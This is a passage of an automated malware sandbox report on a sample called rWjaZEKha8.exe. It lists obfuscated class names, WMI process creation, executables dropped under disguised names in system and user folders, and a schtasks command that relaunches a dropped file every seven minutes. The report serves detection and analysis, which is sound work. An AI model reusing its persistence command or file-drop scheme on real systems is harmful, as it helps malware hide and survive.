            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, YAj6ex9jXrGltQxbMXX.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'Kq3c6ZKuCy', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, grqLMLtFcxLs483pUne.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, yR5TOuYlxDDZ8tlXV6w.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, jV7dYKKl6U3xuE2DQ1Y.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'DVXQmjbO4vsAn23POk8', 'sFMmxkbLMteUkC1xiHX', 'IA1AcSb0isdyrBJMsa0', 'BGQ3M2bSjow5KZ2RW1s', 'vgBmsSb1GdZLXtyMYqD', 'I4DHUbbkLFJJQwA4iWE'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, ejih03wB6xcYUYUs1sN.csHigh entropy of concatenated method names: 'sg9', 'rtIfK5R59d', 'olOGRwqOra', 'GxLf4nB59C', 'iVBthY1pn7HjU11hLuq', 'BeBgdb1nTbUlx4yNPJx', 'M5LVcO1D5F31DQWqawE', 'lC9ToY18p2X8PPBRAC9', 'Evxu3X1PSRKxgjb1rtW', 'irydOv1xMW45rb57LBi'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, VeBxUrwVjT0KXvHo2cR.csHigh entropy of concatenated method names: 'GG9G8rnkBG', 'uIJGmpVIQx', 'xcwGgaaSm2', 'h2G8jWSFZbQK2X5gfTG', 'sOFkxiShnKhInS74dNJ', 'WjweQASeog0s75aVMJy', 'Dei0SGSR3nU8H8Qracf', 'wEJGtxheyI', 'nYLGLGpnjF', 'gCRG2BgT6C'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, MGdHOsySsH5376RNUj.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'sGaF62uUCeFhCOtctAj', 'vox1hVu9UGBH9ZcpEM4', 'zvm7eUuarRjweMFIJ69', 'kKNejvuQt12F8DMhuUD', 'qar21TuX3U3B52rHJxR', 'fF2VK8uTMaJ0Fu4C2Kk'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, KS9mERwza0WXlKRhU8e.csHigh entropy of concatenated method names: 'AJ7xyQ37yC', 'r2HxQVH15W', 'V3PxDyiFX9', 'bGT8dOMhvSyhiHIUAEy', 'wfTTG9MelEAr2TGBtCC', 'pA40RiMlQ0HEXhI3Xwt', 'feBYSLMELWWgrrNgSWg', 'XySM05MFSA3sumrcElM', 'JFMYUgMR2aKpuagJI4r', 'vTKDrOM8VCpAA7c2a4g'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, l17kOXwYIBwJirZfg92.csHigh entropy of concatenated method names: 'KSNLBmvOOZ', 'vrxLpYDjp5', 'C5NLdIUP3S', 'ArrLhEA2id', 's4lLCS5kBS', 'rSBLPU9qvP', 'nXBorCOYT14y46FBCZa', 'EiUsPKO3CsSCRCD0Utj', 'pHRnSPOqnEAaTD29tIm', 'qJll7OOgeaSGjVfMIZ7'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, lLKw7QYGvH9i55FOmbc.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, KIhmyy4EctCq2Of9aUn.csHigh entropy of concatenated method names: 'un8YqCPJE1', 'UiTYiso8R7', 'L2UjMBTMQ1v7hXbnZXa', 'VQiTSvTVbbyn3e47j1I', 'JStZ5VT1VfLsnCl4U6p', 'irFxbiTkmQ5q26knqoI', 'ivrlHST5x7h5DxR8BRg', 'uboKqMT3MjdXiew9eGb', 'NFo284Tqc6OK9YnZuQD', 'PD6NJATYVnxoqDEAPZ5'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, zX4Zwi41LTQ8CeoyUiI.csHigh entropy of concatenated method names: 'h4ot2mJFSl', 'imXtGdbk67', 'U59yxp4G5Rwo3Gcy8Go', 'aUo22K4mlkaOx6qieMk', 'Et2CdD46qSei4rIubAN', 'uhclQU4vvkDIO3ouKVl', 'Gs9tg9dqNH', 'bAlSZbfdHTFelRRkMcV', 'TRKRoYfiPe48qAwTN17', 'Q7CQeW4sapkhnC5uFRY'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, q2Rsc8KHuqg7EH1dMcS.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'gWY5q8U7KtMEFlCgKtW', 'oLD4C5UIiUHZgxAkmQP', 'xspmvDUHKC17De60lwT', 'lRuaMLUwMPFlpiDkKKV', 'XQYq4lUcZ2TpDmrQER0', 'sK3yTuUyDpjCKyrBj2E'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, w6xDbkt4ZptlmcTYrqj.csHigh entropy of concatenated method names: 'tY3v2bXirO', 'IabvGFDfAP', '_8r1', 'PO8vxXck92', 'vofvlj1Ar4', 'Y8Nvb4HxKL', 'D7Vv7m7EMh', 'MHXhxsEjxfDkEgXqPgK', 'pAUN57ENOBlpcYwSd8c', 'ywM6ojE4etuLTYgv0cm'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, o11V9eXEy449AMCVnE.csHigh entropy of concatenated method names: 'NHInCuVXp', 'R06cHpZAi', 'xhavfS9Qr', 'cgEFETYp3', 'X5nyxjWnh', 'n7fQlkMRA', 'Y0RD8PHwv', 'MfRaVeiokIUrlaHmn68', 'kaRrnNiBPApTbG7rfi5', 'sPLsaYi2qk2cpwekNUZ'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, jv8psmYIhDyNIo457Gh.csHigh entropy of concatenated method names: 'F6q8cKv6OV', 'aJJ8FEDYln', 'xwC8qgK02L', 'YGE8iAPL9t', 'hWX88Z9sIR', 'YvO8mnX42w', 'zqY8gnwVjo', 'kRY8Mtty0s', 'J4M8SFtI13', 'UFE8VcRoln'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, Ktcq3XC3us3rZiHClc.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'HBfVWLrFObjMI6aMbIy', 'JPq9XprRZybdCLbaEbp', 'Rf722vr8vaDvuUrd5eX', 'J9bOklrPHynl40kxkjS', 'Q7g0CMrpNvTZEGF4rok', 'velg67rnYkoIrTfGCNO'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, cNlA0OY9RWDi04sJcf9.csHigh entropy of concatenated method names: 't0Lbgrg1qL', 'c8m4WAVfamSZRj8qZp8', 'Dis1lsVOA10SMf4BjY6', 'kytm9bVNE2Jn4kTtIj9', 'KUfYQSV4yHxpsHHcwRQ', 'WdixUvfCqZ', 'JcOx5Y8HjQ', 'v3JxfTQlbW', 'uYOxJSZqce', 'PkjxeXHF0a'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, TsUQfMt5e68VVXPeGW4.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'WwTFc7nJR5', 'AnUFvsmOgK', 'fsrFFPvB3N', 'vnOFyVfJIt', 'zmeFQHZue5', 'iJEFDoHhww', 'IInruMeyP4mnmeu5dDa'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, MVYlp5KLSXAwL5lXeat.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'oV6bwNZGp3WoPsnVMbu', 'njgAnkZm9aHck2n9aFy', 'puULu1ZKmZgpMV4LS39', 'mdRiFKZt3GYVXCwUuFk', 'g1w9NdZs8HHPKUeAqKu', 'y30p53ZzlyIwrJQbcN6'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, KjAvuPYnKUHFEydxbCy.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'j5PqNZxWmV', '_3il', 'zfOqKNBGEg', 'NcZq4XEN5k', '_78N', 'z3K'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, PEO5QqtcVo65KC4jOJr.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, O36uFnwiQHcdR1eMb0h.csHigh entropy of concatenated method names: 'tg32pXMjae', 'Enp2dBsjUe', 'T892hugTAP', 'lLK2Cw7QvH', 'hAyEYl0Hu0hlIZdvnEV', 'WVZCvG0wYSZUZ3c2Rwx', 'w0rRku0cgfuwh0m47GY', 'l8RmfP07L1aIfb6ADcD', 'oIbSkB0IqJFwyeisp2l', 'JIWqZq0y8bdWdXvWFUc'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, S3dnL0t68ZvBQn3UOBg.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'DmIvngIcUH', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, kKemu04eA9NLP3CB4sG.csHigh entropy of concatenated method names: 'CbK9Demu0A', 'DTkSkfNtgvucvIFGEmi', 'pPQSv0NsFVn7tdoXuMJ', 'r5U2vqNmk8PS9PUV44N', 'sISghcNKrhkHqq349C5', 'MBPE72NzthEGD7ossCL', 'eIq0FQ4dEyYSeyyEXZ7', 'EP3Man4iZtEupvAkCbj', 'QrpCZx4u5MV9bLemxxQ', 'OdDUTH4W971YHSBJdI5'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, BCQvLxLlFdHPMXg3lqq.csHigh entropy of concatenated method names: 'iVNVUmww49LG0', 'JvYqKW8T5wW1fXVvLmB', 'NZpI5f8jpZV17bEgfAh', 'h4GEVx8NgVmbnd9Vr9f', 'sycAsf84uUaw1g9i3ys', 'oIJedq8fQwn18QdigTd', 'wRWVeI8Q5ETNydYWVNX', 'sqGxdX8XCjPoBjaGgRt', 'Y7HhuT8OxYs6OIYsChA', 'ly43ri8Lga1fYjW1G4y'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, n7F4pDLcQ7qsWQINwZv.csHigh entropy of concatenated method names: 'pKk5nEFpfY', 'Neq5cKK7TD', 'z7h5v1af8L', 'Xv35F8lXIl', 'tVS5ySwbVd', 'V0k5QWkDNj', 'UFg5Dn3IjP', 'h1i5UWUmJd', 'hCb55gWnWn', 'Byy5fdyeCj'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, a6ksCPwxZFgqlmNefeo.csHigh entropy of concatenated method names: 'lZg2J6F4iZ', 'IoF2eLmqNK', 'DMc2Ao4UmW', 'GU6HYo0XA0f0Eeqnixa', 'sWednG0ain2nZE8ch8e', 'WbvMAE0QZY4cP9OnNKJ', 'jgUasZ0TH12gG9FFKwS', 'kqG28QmK3D', 'PFZ2m87SMx', 'F932gtWNYP'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, TWd7Lh9wqkoH4hSZORi.csHigh entropy of concatenated method names: 'ltjGcFI1qXUSDkX0FqN', 'R8YMPpIkTMWbdR24Ng1', 'VfsfTII0ff7ZnlAj0pm', 'frO1jFISecwNfgxb1Ah', 'KPOEnnji8r', 'LSAguII5TqSVhML1veU', 'xSHd1wI3If2DNZ6Q33c', 'CHvuSjIM88NxGeMkL55', 'GluHjVIVWSJ0Z0FNtHn', 'jnEExlIqWmlLKG5PrPG'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, BX0uW8Kcx5ApPIFurXl.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'Vt3CNxoPhiAYnlxiax3', 'mhZu61opYAEmU2PPoU6', 'OP05VaonclsFonAmtMK', 'bexolmoD30kpAt4u9PG', 'a8DWx4oxrPaFkSloX8w', 'MEZ7T7o6nrhBG8DE0yt'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, vDPU3iKisC8tjZEBtDw.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'HS55j5bljoJ7JVA7yuQ', 'Eyq7ipbEsJWyyyYjC65', 'U0R0Pgbh2J18pHM9Bhy', 'qansAtbeJkEUBQdTXRM', 'WbwtxBbFtf8RkC8QL9E', 'Cy0ESIbRZBnETamEyxS'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, NRxTCNrvXrRtMQFAuv.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'hAtXW3AqFP80rltWfqU', 'HmJ3hMAY9ygBnE0ZJZe', 'ueWGfBAg7nxomjGHOAb', 's934q1AC7koNoSPHe3k', 'FYbk6gA7RVcTB4nGMgk', 'VFuvdjAIUjPjIyWunBI'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, VfUIv8ttd6Da3kTL8fe.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files\Windows Portable Devices\Idle.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\OjTEkrTlLyhdt.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\3D Objects\OjTEkrTlLyhdt.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exeJump to dropped file
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeFile created: C:\bridgehyperperfdhcp\intoDhcp.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files (x86)\Microsoft Office\dasHost.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files\Windows Portable Devices\upfc.exeJump to dropped file
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\OjTEkrTlLyhdt.exeJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the user root directory
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\OjTEkrTlLyhdt.exeJump to dropped file
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
